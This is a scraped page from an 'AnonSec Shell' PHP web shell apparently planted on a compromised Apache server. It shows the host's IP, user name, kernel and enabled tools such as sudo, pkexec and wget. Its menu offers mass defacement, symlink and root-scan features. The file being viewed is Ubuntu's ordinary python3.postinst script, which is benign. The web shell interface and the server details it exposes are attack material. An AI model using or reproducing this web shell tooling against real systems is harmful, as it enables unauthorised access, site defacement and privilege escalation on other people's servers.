%PDF-1.4 %Óëéá 1 0 obj <> endobj 3 0 obj <> endobj 4 0 obj < AnonSec Shell
AnonSec Shell
Server IP : 212.252.79.165  /  Your IP : 216.73.217.172   [ Reverse IP ]
Web Server : Apache
System : Linux 212-252-79-165.cprapid.com 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
User : cehaburo ( 1001)
PHP Version : 8.1.33
Disable Function : exec,passthru,shell_exec,system
Domains : 48 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/cehaburo/public_html/images/product/anon_sym/anon/var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/cehaburo/public_html/images/product/anon_sym/anon/var/lib/dpkg/info/python3.postinst
#! /bin/sh
set -e

new_config_file()
{
    cat > /etc/python3/debian_config <<-EOF
	[DEFAULT]
	# how to byte-compile (comma separated: standard, optimize)
	byte-compile = standard
	EOF
}

case "$1" in
    configure)
	[ -d /etc/python3 ] || mkdir /etc/python3
	[ -f /etc/python3/debian_config ] || new_config_file

	oldv=$(echo $2 | sed 's/^\(...\).*/\1/')
	if [ "$DEBIAN_FRONTEND" != noninteractive ]; then
	    echo "running python rtupdate hooks for python3.10..."
	fi
	for hook in /usr/share/python3/runtime.d/*.rtupdate; do
	    [ -x $hook ] || continue
	    if ! $hook rtupdate python$oldv python3.10; then
	        hb=$(basename $hook .rtupdate)
	        echo >&2 "error running python rtupdate hook $hb"
	        errors=yes
	    fi
	done
	[ -z "$errors" ] || exit 4

	if [ "$DEBIAN_FRONTEND" != noninteractive ]; then
	    echo "running python post-rtupdate hooks for python3.10..."
	fi
	for hook in /usr/share/python3/runtime.d/*.rtupdate; do
	    [ -x $hook ] || continue
	    if ! $hook post-rtupdate python$oldv python3.10; then
	        hb=$(basename $hook .rtupdate)
	        echo >&2 "error running python post-rtupdate hook $hb"
	        errors=yes
	    fi
	done
	[ -z "$errors" ] || exit 5
esac

if which py3compile >/dev/null 2>&1; then
	py3compile -p python3 /usr/share/python3/
fi



Anon7 - 2022
AnonSec Team